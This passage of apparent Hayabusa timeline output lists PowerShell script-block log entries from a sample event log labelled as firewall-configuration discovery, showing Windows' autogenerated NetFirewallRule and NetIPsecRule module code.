if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 